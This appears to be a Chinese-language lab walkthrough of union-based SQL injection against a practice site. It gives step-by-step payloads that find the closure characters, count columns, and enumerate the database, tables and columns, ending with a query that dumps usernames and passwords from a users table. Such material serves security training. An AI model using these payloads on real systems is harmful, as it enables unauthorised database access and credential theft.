0、初始页面

1、确定闭合符号

前两条判断是否为数值型注入，后两条判断字符型注入的闭合符号

?id=1 and 1=1  ?id=1 and 1=2 ?id=1" ?id=1")

2、确定表的列数

?id=1") order by 3 --+

3、确定回显位置 

?id=-1") union select 1,2,3 --+

4、爆库名

?id=-1") union select 1,user(),database() --+

5、爆表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

6、爆列名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security' --+

7、显示最终目标

?id=-1") union select 1,2,group_concat(username,0x3a,password) from security.users --+